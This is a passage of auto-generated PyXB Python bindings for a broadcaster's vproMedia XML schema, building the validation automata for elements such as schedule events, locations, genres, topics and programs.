symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'guideDay')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 739, 6))
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'start')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 740, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'offset')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 742, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'poProgID')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'primaryLifestyle')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'secondaryLifestyle')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_6, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, True) ]))
st_13._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
scheduleEventType._Automaton = _BuildAutomaton_17()
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'programUrl'), pyxb.binding.datatypes.anyURI, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 811, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), avAttributesType, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'subtitles'), pyxb.binding.datatypes.string, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'offset'), pyxb.binding.datatypes.duration, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'duration'), pyxb.binding.datatypes.duration, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6)))
def _BuildAutomaton_18 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_18
del _BuildAutomaton_18
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6))
counters.add(cc_3)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'programUrl')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 811, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'subtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'offset')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
locationType._Automaton = _BuildAutomaton_18()
memberRefType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), recursiveMemberRef, scope=memberRefType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6)))
memberRefType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), recursiveMemberRef, scope=memberRefType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6)))
memberRefType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), recursiveMemberRef, scope=memberRefType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6)))
def _BuildAutomaton_19 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_19
del _BuildAutomaton_19
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(memberRefType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'episodeOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(memberRefType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(memberRefType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segmentOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
memberRefType._Automaton = _BuildAutomaton_19()
recursiveMemberRef._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), recursiveMemberRef, scope=recursiveMemberRef, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6)))
recursiveMemberRef._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), recursiveMemberRef, scope=recursiveMemberRef, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6)))
recursiveMemberRef._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), recursiveMemberRef, scope=recursiveMemberRef, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6)))
def _BuildAutomaton_20 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_20
del _BuildAutomaton_20
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(recursiveMemberRef._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(recursiveMemberRef._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'episodeOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(recursiveMemberRef._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segmentOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
recursiveMemberRef._Automaton = _BuildAutomaton_20()
genreType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'term'), termType, scope=genreType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6)))
def _BuildAutomaton_21 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_21
del _BuildAutomaton_21
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(genreType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'term')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
genreType._Automaton = _BuildAutomaton_21()
geoLocationsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'geoLocation'), geoLocationType, scope=geoLocationsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6)))
def _BuildAutomaton_22 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_22
del _BuildAutomaton_22
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(geoLocationsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
geoLocationsType._Automaton = _BuildAutomaton_22()
geoLocationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), pyxb.binding.datatypes.string, scope=geoLocationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 981, 6)))
geoLocationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), pyxb.binding.datatypes.string, scope=geoLocationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6)))
def _BuildAutomaton_23 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_23
del _BuildAutomaton_23
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(geoLocationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 981, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(geoLocationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scopeNote')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
geoLocationType._Automaton = _BuildAutomaton_23()
topicsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'topic'), topicType, scope=topicsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6)))
def _BuildAutomaton_24 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_24
del _BuildAutomaton_24
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(topicsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topic')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
topicsType._Automaton = _BuildAutomaton_24()
topicType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), pyxb.binding.datatypes.string, scope=topicType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 998, 6)))
topicType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), pyxb.binding.datatypes.string, scope=topicType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6)))
def _BuildAutomaton_25 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_25
del _BuildAutomaton_25
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(topicType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 998, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(topicType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scopeNote')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
topicType._Automaton = _BuildAutomaton_25()
intentionType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'intention'), intentionEnum, scope=intentionType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6)))
def _BuildAutomaton_26 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_26
del _BuildAutomaton_26
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(intentionType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intention')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
intentionType._Automaton = _BuildAutomaton_26()
targetGroupsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'targetGroup'), targetGroupEnum, scope=targetGroupsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6)))
def _BuildAutomaton_27 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_27
del _BuildAutomaton_27
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(targetGroupsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroup')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
targetGroupsType._Automaton = _BuildAutomaton_27()
programType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvents'), scheduleEventsType, scope=programType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10)))
programType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), memberRefType, scope=programType, documentation="\n A program (only if its type is 'BROADCAST') can be an episode of a group of type 'SERIES' or 'SEASON'.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10)))
programType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segments'), segmentsType, scope=programType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10)))
def _BuildAutomaton_28 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_28
del _BuildAutomaton_28
import pyxb.utils.fac as fac
